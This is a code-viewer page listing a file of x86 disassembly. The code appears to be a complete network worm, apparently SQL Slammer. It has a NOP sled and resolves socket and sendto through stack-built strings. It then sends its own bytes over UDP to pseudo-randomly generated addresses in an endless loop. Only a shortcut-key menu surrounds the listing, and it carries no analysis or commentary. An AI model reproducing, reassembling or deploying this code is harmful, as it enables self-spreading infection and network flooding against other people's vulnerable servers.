📄 disassembly.txt
字号:
00000000 90 nop00000001 90 nop00000002 90 nop00000003 90 nop00000004 90 nop00000005 90 nop00000006 90 nop00000007 90 nop00000008 68DCC9B042 push dword 0x42b0c9dc0000000D B801010101 mov eax,0x101010100000012 31C9 xor ecx,ecx00000014 B118 mov cl,0x1800000016 50 push eax00000017 E2FD loop 0x1600000019 3501010105 xor eax,0x50101010000001E 50 push eax0000001F 89E5 mov ebp,esp00000021 51 push ecx00000022 682E646C6C push dword 0x6c6c642e00000027 68656C3332 push dword 0x32336c650000002C 686B65726E push dword 0x6e72656b00000031 51 push ecx00000032 686F756E74 push dword 0x746e756f00000037 6869636B43 push dword 0x436b63690000003C 6847657454 push dword 0x5474654700000041 66B96C6C mov cx,0x6c6c00000045 51 push ecx00000046 6833322E64 push dword 0x642e32330000004B 687773325F push dword 0x5f32737700000050 66B96574 mov cx,0x746500000054 51 push ecx00000055 68736F636B push dword 0x6b636f730000005A 66B9746F mov cx,0x6f740000005E 51 push ecx0000005F 6873656E64 push dword 0x646e657300000064 BE1810AE42 mov esi,0x42ae101800000069 8D45D4 lea eax,[ebp-0x2c]0000006C 50 push eax0000006D FF16 call near [esi]0000006F 50 push eax00000070 8D45E0 lea eax,[ebp-0x20]00000073 50 push eax00000074 8D45F0 lea eax,[ebp-0x10]00000077 50 push eax00000078 FF16 call near [esi]0000007A 50 push eax0000007B BE1010AE42 mov esi,0x42ae101000000080 8B1E mov ebx,[esi]00000082 8B03 mov eax,[ebx]00000084 3D558BEC51 cmp eax,0x51ec8b5500000089 7405 jz 0x900000008B BE1C10AE42 mov esi,0x42ae101c00000090 FF16 call near [esi]00000092 FFD0 call eax00000094 31C9 xor ecx,ecx00000096 51 push ecx00000097 51 push ecx00000098 50 push eax00000099 81F10301049B xor ecx,0x9b0401030000009F 81F101010101 xor ecx,0x1010101000000A5 51 push ecx000000A6 8D45CC lea eax,[ebp-0x34]000000A9 50 push eax000000AA 8B45C0 mov eax,[ebp-0x40]000000AD 50 push eax000000AE FF16 call near [esi]000000B0 6A11 push byte +0x11000000B2 6A02 push byte +0x2000000B4 6A02 push byte +0x2000000B6 FFD0 call eax000000B8 50 push eax000000B9 8D45C4 lea eax,[ebp-0x3c]000000BC 50 push eax000000BD 8B45C0 mov eax,[ebp-0x40]000000C0 50 push eax000000C1 FF16 call near [esi]000000C3 89C6 mov esi,eax000000C5 09DB or ebx,ebx000000C7 81F33C61D9FF xor ebx,0xffd9613c000000CD 8B45B4 mov eax,[ebp-0x4c]000000D0 8D0C40 lea ecx,[eax+eax*2]000000D3 8D1488 lea edx,[eax+ecx*4]000000D6 C1E204 shl edx,0x4000000D9 01C2 add edx,eax000000DB C1E208 shl edx,0x8000000DE 29C2 sub edx,eax000000E0 8D0490 lea eax,[eax+edx*4]000000E3 01D8 add eax,ebx000000E5 8945B4 mov [ebp-0x4c],eax000000E8 6A10 push byte +0x10000000EA 8D45B0 lea eax,[ebp-0x50]000000ED 50 push eax000000EE 31C9 xor ecx,ecx000000F0 51 push ecx000000F1 6681F17801 xor cx,0x178000000F6 51 push ecx000000F7 8D4503 lea eax,[ebp+0x3]000000FA 50 push eax000000FB 8B45AC mov eax,[ebp-0x54]000000FE 50 push eax000000FF FFD6 call esi00000101 EBCA jmp short 0xcd
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -